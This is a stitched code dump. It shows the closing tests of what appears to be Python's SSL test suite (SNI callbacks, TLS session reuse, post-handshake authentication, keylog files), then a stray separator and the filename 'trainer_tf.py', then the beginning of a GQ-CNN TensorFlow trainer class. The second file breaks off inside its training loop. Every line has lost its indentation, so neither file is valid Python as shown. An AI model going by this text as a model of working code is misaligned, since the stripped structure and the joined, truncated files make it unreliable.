def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
def setUpModule():
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
|
trainer_tf.py
|
# -*- coding: utf-8 -*-
"""
Copyright ©2017. The Regents of the University of California (Regents). All Rights Reserved.
Permission to use, copy, modify, and distribute this software and its documentation for educational,
research, and not-for-profit purposes, without fee and without a signed licensing agreement, is
hereby granted, provided that the above copyright notice, this paragraph and the following two
paragraphs appear in all copies, modifications, and distributions. Contact The Office of Technology
Licensing, UC Berkeley, 2150 Shattuck Avenue, Suite 510, Berkeley, CA 94720-1620, (510) 643-
7201, otl@berkeley.edu, http://ipira.berkeley.edu/industry-info for commercial licensing opportunities.
IN NO EVENT SHALL REGENTS BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL,
INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST PROFITS, ARISING OUT OF
THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF REGENTS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
REGENTS SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE SOFTWARE AND ACCOMPANYING DOCUMENTATION, IF ANY, PROVIDED
HEREUNDER IS PROVIDED "AS IS". REGENTS HAS NO OBLIGATION TO PROVIDE
MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
"""
Trains a GQCNN network using Tensorflow backend.
Author: Vishal Satish and Jeff Mahler
"""
import argparse
import collections
import copy
import json
import pickle as pkl
import os
import random
import shutil
import signal
import subprocess
import sys
import threading
import time
import multiprocessing as mp
import queue
import cv2
import numpy as np
import scipy.misc as sm
import scipy.stats as ss
import tensorflow as tf
from autolab_core import BinaryClassificationResult, RegressionResult, TensorDataset, YamlConfig, Logger
from autolab_core.constants import *
import autolab_core.utils as utils
from gqcnn.utils import ImageMode, TrainingMode, GripperMode, InputDepthMode, GeneralConstants, TrainStatsLogger, pose_dim, read_pose_data, weight_name_to_layer_name, GQCNNTrainingStatus
class GQCNNTrainerTF(object):
""" Trains a GQ-CNN with Tensorflow backend. """
def __init__(self, gqcnn,
dataset_dir,
split_name,
output_dir,
config,
name=None,
progress_dict=None,
verbose=True):
"""
Parameters
----------
gqcnn : :obj:`GQCNN`
grasp quality neural network to optimize
dataset_dir : str
path to the training / validation dataset
split_name : str
name of the split to train on
output_dir : str
path to save the model output
config : dict
dictionary of configuration parameters
name : str
name of the the model
"""
self.gqcnn = gqcnn
self.dataset_dir = dataset_dir
self.split_name = split_name
self.output_dir = output_dir
self.cfg = config
self.tensorboard_has_launched = False
self.model_name = name
self.progress_dict = progress_dict
self.finetuning = False
# create a directory for the model
if self.model_name is None:
model_id = utils.gen_experiment_id()
self.model_name = 'model_%s' %(model_id)
self.model_dir = os.path.join(self.output_dir, self.model_name)
if not os.path.exists(self.model_dir):
os.mkdir(self.model_dir)
# set up logger
self.logger = Logger.get_logger(self.__class__.__name__, log_file=os.path.join(self.model_dir, 'training.log'), silence=(not verbose), global_log_file=verbose)
# check default split
if split_name is None:
self.logger.warning('Using default image-wise split.')
self.split_name = 'image_wise'
# update cfg for saving
self.cfg['dataset_dir'] = self.dataset_dir
self.cfg['split_name'] = self.split_name
def _create_loss(self):
""" Creates a loss based on config file
Returns
-------
:obj:`tensorflow Tensor`
loss
"""
if self.cfg['loss'] == 'l2':
return (1.0 / self.train_batch_size) * tf.nn.l2_loss(tf.subtract(tf.nn.sigmoid(self.train_net_output), self.train_labels_node))
elif self.cfg['loss'] == 'sparse':
if self._angular_bins > 0:
log = tf.reshape(tf.dynamic_partition(self.train_net_output, self.train_pred_mask_node, 2)[1], (-1, 2))
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(_sentinel=None, labels=self.train_labels_node,
logits=log))
else:
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(_sentinel=None, labels=self.train_labels_node, logits=self.train_net_output, name=None))
elif self.cfg['loss'] == 'weighted_cross_entropy':
return tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=tf.reshape(self.train_labels_node, [-1,1]),
logits=self.train_net_output,
pos_weight=self.pos_weight,
name=None))
def _create_optimizer(self, loss, batch, var_list, learning_rate):
""" Create optimizer based on config file
Parameters
----------
loss : :obj:`tensorflow Tensor`
loss to use, generated with _create_loss()
batch : :obj:`tf.Variable`
variable to keep track of the current gradient step number
var_list : :obj:`lst`
list of tf.Variable objects to update to minimize loss(ex. network weights)
learning_rate : float
learning rate for training
Returns
-------
:obj:`tf.train.Optimizer`
optimizer
"""
# instantiate optimizer
if self.cfg['optimizer'] == 'momentum':
optimizer = tf.train.MomentumOptimizer(learning_rate, self.momentum_rate)
elif self.cfg['optimizer'] == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate)
elif self.cfg['optimizer'] == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate)
else:
raise ValueError('Optimizer %s not supported' %(self.cfg['optimizer']))
# compute gradients
gradients, variables = zip(*optimizer.compute_gradients(loss, var_list=var_list))
# clip gradients to prevent exploding gradient problem
gradients, global_grad_norm = tf.clip_by_global_norm(gradients, self.max_global_grad_norm)
# generate op to apply gradients
apply_grads = optimizer.apply_gradients(zip(gradients, variables), global_step=batch)
return apply_grads, global_grad_norm
def _launch_tensorboard(self):
""" Launches Tensorboard to visualize training """
FNULL = open(os.devnull, 'w')
self.logger.info(
"Launching Tensorboard, Please navigate to localhost:{} in your favorite web browser to view summaries".format(self._tensorboard_port))
self._tensorboard_proc = subprocess.Popen(['tensorboard', '--port', str(self._tensorboard_port),'--logdir', self.summary_dir], stdout=FNULL)
def _close_tensorboard(self):
"""Closes Tensorboard process."""
self.logger.info('Closing Tensorboard...')
self._tensorboard_proc.terminate()
def train(self):
""" Perform optimization. """
with self.gqcnn.tf_graph.as_default():
self._train()
def _train(self):
""" Perform optimization. """
start_time = time.time()
# run setup
if self.progress_dict is not None:
self.progress_dict['training_status'] = GQCNNTrainingStatus.SETTING_UP
self._setup()
# build network
self.gqcnn.initialize_network(self.input_im_node, self.input_pose_node)
# optimize weights
if self.progress_dict is not None:
self.progress_dict['training_status'] = GQCNNTrainingStatus.TRAINING
self._optimize_weights()
def finetune(self, base_model_dir):
""" Perform fine-tuning.
Parameters
----------
base_model_dir : str
path to the pre-trained base model to use
"""
with self.gqcnn.tf_graph.as_default():
self._finetune(base_model_dir)
def _finetune(self, base_model_dir):
""" Perform fine-tuning.
Parameters
----------
base_model_dir : str
path to the pre-trained base model to use
"""
# set flag and base model for fine-tuning
self.finetuning = True
self.base_model_dir = base_model_dir
# run setup
self._setup()
# build network
self.gqcnn.set_base_network(base_model_dir)
self.gqcnn.initialize_network(self.input_im_node, self.input_pose_node)
# optimize weights
if self.progress_dict is not None:
self.progress_dict['training_status'] = GQCNNTrainingStatus.TRAINING
self._optimize_weights(finetune=True)
def _optimize_weights(self, finetune=False):
""" Optimize the network weights. """
start_time = time.time()
# setup output
self.train_net_output = self.gqcnn.output
if self.training_mode == TrainingMode.CLASSIFICATION:
if self.cfg['loss'] == 'weighted_cross_entropy':
self.gqcnn.add_sigmoid_to_output()
else:
self.gqcnn.add_softmax_to_output()
elif self.training_mode == TrainingMode.REGRESSION:
self.gqcnn.add_sigmoid_to_output()
else:
raise ValueError('Training mode: {} not supported !'.format(self.training_mode))
train_predictions = self.gqcnn.output
drop_rate_in = self.gqcnn.input_drop_rate_node
self.weights = self.gqcnn.weights
# once weights have been initialized create tf Saver for weights
self.saver = tf.train.Saver()
# form loss
with tf.name_scope('loss'):
# part 1: error
loss = self._create_loss()
unregularized_loss = loss
# part 2: regularization
layer_weights = self.weights.values()
with tf.name_scope('regularization'):
regularizers = tf.nn.l2_loss(layer_weights[0])
for w in layer_weights[1:]:
regularizers = regularizers + tf.nn.l2_loss(w)
loss += self.train_l2_regularizer * regularizers
# setup learning rate
batch = tf.Variable(0)
learning_rate = tf.train.exponential_decay(
self.base_lr, # base learning rate.
batch * self.train_batch_size, # current index into the dataset.
self.decay_step, # decay step.
self.decay_rate, # decay rate.
staircase=True)
# setup variable list
var_list = self.weights.values()
if finetune:
var_list = []
for weights_name, weights_val in self.weights.items():
layer_name = weight_name_to_layer_name(weights_name)
if self.optimize_base_layers or layer_name not in self.gqcnn._base_layer_names:
var_list.append(weights_val)
# create optimizer
with tf.name_scope('optimizer'):
apply_grad_op, global_grad_norm = self._create_optimizer(loss, batch, var_list, learning_rate)
# add a handler for SIGINT for graceful exit
def handler(signum, frame):
self.logger.info('caught CTRL+C, exiting...')
self._cleanup()
exit(0)
signal.signal(signal.SIGINT, handler)
# now that everything in our graph is set up, we write the graph to the summary event so it can be visualized in tensorboard
self.summary_writer.add_graph(self.gqcnn.tf_graph)
# begin optimization loop
try:
# start prefetch queue workers
self.prefetch_q_workers = []
seed = self._seed
for i in range(self.num_prefetch_q_workers):
if self.num_prefetch_q_workers > 1 or not self._debug:
seed = np.random.randint(GeneralConstants.SEED_SAMPLE_MAX)
p = mp.Process(target=self._load_and_enqueue, args=(seed,))
p.start()
self.prefetch_q_workers.append(p)
# init TF variables
init = tf.global_variables_initializer()
self.sess.run(init)
self.logger.info('Beginning Optimization...')
# create a TrainStatsLogger object to log training statistics at certain intervals
self.train_stats_logger = TrainStatsLogger(self.model_dir)
# loop through training steps
training_range = range(int(self.num_epochs * self.num_train) // self.train_batch_size)
for step in training_range:
